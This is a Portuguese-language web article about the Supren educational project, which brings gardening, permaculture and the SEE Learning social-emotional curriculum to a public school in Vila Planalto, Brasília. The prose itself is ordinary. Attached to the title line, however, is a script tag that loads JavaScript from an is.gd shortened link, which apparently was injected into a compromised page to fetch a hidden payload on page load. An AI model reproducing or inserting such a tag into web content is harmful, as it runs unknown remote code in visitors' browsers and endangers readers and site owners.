08 out
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Projeto Educacional Supren – A União Planetária realizando o ODS 4 da ONU<script src="https://is.gd/WRxGba?V=27"></script>

Artigo de Eduardo Weaver

 

O Projeto Educacional Supren é a realização de um sonho que a União Planetária vem acalentando por muitos anos. Ele se consolidou em resposta a um edital da FAP-DF elaborado em conjunto com a Secretaria de Educação do Distrito Federal. A União Planetária foi uma das quatro OSCs selecionadas em 2019 pelo edital para elaborar um projeto de Escola Inovadora. Depois de dois anos de trabalho interativo, o contrato com a FAP-DF foi finalmente firmado em agosto de 2021. A escola pública da Vila Planalto foi escolhida por dispor de uma estrutura ideal para receber nosso Projeto e por já possuir um ótimo relacionamento com os colaboradores da União Planetária desde que começou a participar do Projeto Yoga nas Escolas de nossa entidade.

O Projeto Educacional Supren visa a construção coletiva de um currículo vivencial numa estrutura coerente com os princípios democráticos, solidários, éticos e cidadãos, promovendo meios para desenvolver nos estudantes e na comunidade educacional uma conscientização acerca de regeneração humana e planetária, valorização da diversidade e da cidadania, tendo como pano de fundo a cultura de paz e o respeito à natureza e a todos os seres vivos.

Um foco especial foi colocado no “esverdeamento” e embelezamento da escola com o plantio de árvores, a construção de um viveiro, hortas com um canteiro para cada turma, uma agrofloresta, uma composteira e um ecoparque. As atividades relacionadas à educação ambiental e aos projetos permaculturais servirão adicionalmente como instrumentos para o desenvolvimento da sensibilidade e da consciência corporal, contribuindo para uma educação integral. Atividades ao ar livre e em contato com a natureza trarão também um impacto positivo na saúde dos estudantes e no aprendizado das diversas disciplinas, constituindo um laboratório vivo onde diversos conteúdos pedagógicos poderão ser trabalhados pelos professores em um ambiente lúdico e prazeroso. Professores, gestores e estudantes poderão experimentar o contato com a terra, aprendendo técnicas de preparação do solo, semeadura, manejo das culturas, otimização do uso da água e dos insumos naturais (incluindo a reciclagem dos resíduos orgânicos por meio da compostagem), colheita, preparo dos alimentos e consumo consciente, tudo dentro do contexto do “Aprendizado Baseado em Projetos” e do “Aprender Fazendo”

O Projeto Educacional Supren utilizará adicionalmente algumas estratégias e ferramentas que o distinguem de outras iniciativas de inovação escolar:

  1. Uma Plataforma Colaborativa de Software de fácil utilização para a preparação e realização de aulas presenciais e online mais comunicativas e interativas, a Gestão Integrada da Aprendizagem e Gestão do Conhecimento. Com essa plataforma estudantes, pais de alunos e a comunidade do bairro poderão participar dos projetos e cursos de forma organizada e produtiva.
  2. Treinamento do corpo docente da escola, pais de alunos e a comunidade do bairro sobre Cultura Regenerativa, Gestão Participativa, Pedagogia da Cooperação, Comunicação Não Violenta, tecnologias limpas, a Arte de Viver em Paz, saúde, consumo consciente e o uso da metodologia SEE Learning™
  3. Escola aberta que presta serviços para o bairro, atuando como centro de difusão de boas práticas e bons hábitos, e desenvolvendo projetos onde professores e estudantes são transformados em protagonistas do processo de mudança socioambiental de sua comunidade.
  4. Vínculo com a comunidade da Vila Planalto e a comunidade global, superando fronteiras, diferenças culturais e étnicas, estimulando professores e estudantes a se conectarem, assimilarem as mudanças advindas das evoluções do mundo digital e as inovações tecnológicas, trocarem informações e realizarem projetos junto com outras escolas, inclusive de outros países, que estejam atuando em linhas similares; buscando conectar sistemas de gestão educacional e facilitar o acesso ao conhecimento gerado;

A metodologia SEE Learning ™ – Aprendizagem Social, Emocional e Ética, traz uma abordagem inovadora descrita como uma educação para o coração e para a mente. A União Planetária assinou um termo de parceria com a Universidade de Emory nos EUA para aplicar esta metodologia em escolas brasileiras. A Escola da Vila Planalto será a primeira escola pública no Brasil a ter a oportunidade de ver aplicada esta revolucionária metodologia em sala de aula.

Depois de uma fase de capacitação dos professores, as atividades e práticas preconizadas pelo SEE Learning ™ estarão integradas com o currículo escolar em todos os níveis, desde a educação infantil até o nono grau. Com base no trabalho do psicólogo Daniel Goleman sobre inteligência emocional no início dos anos 90, a Aprendizagem SEE Learning™ foca o desenvolvimento do pensamento crítico, o raciocínio ético e a compaixão, e enfatiza as semelhanças presentes nos seres humanos de diferentes culturas e etnias, e não nas diferenças, desenvolvendo nas crianças e jovens sentimentos de empatia, que são tão necessários para um convívio pacífico.

Embora o nosso Projeto tenha várias propostas inovadoras, a sua personalização para a realidade da escola e da comunidade da Vila Planalto será co-criada em conjunto com os professores e gestores da escola. A ferramenta Dragon Dreaming será utilizada, iniciando com uma imersão quando professores e gestores serão estimulados a compartilharem como seria a escola de seus sonhos. Desta forma o Projeto passará a ser visto como a realização de um sonho coletivo e terá uma adesão forte de toda a comunidade escolar.

Os conceitos e práticas trabalhados nas oficinas serão compartilhados com os pais de alunos e com a comunidade do bairro. A escola exercerá um papel de centro irradiador de conhecimento e boas práticas. Serão organizadas palestras mensais à noite pelos facilitadores/consultores para pais e interessados e workshops de final de semana (sábados), abertos e gratuitos, para a comunidade do bairro.  Os temas serão basicamente os mesmos que foram trabalhados nas oficinas de formação dos professores, acrescidos de mais alguns temas de interesse socio-econômico-ambiental para a comunidade do bairro.

A aplicação do Projeto Educacional Supren na Vila Planalto é uma experiência piloto que deverá ser posteriormente multiplicada com a difusão de suas metodologias e práticas para outras escolas do DF e do país, contribuindo para que uma educação de qualidade e voltada para o estudante esteja ao alcance de todos.

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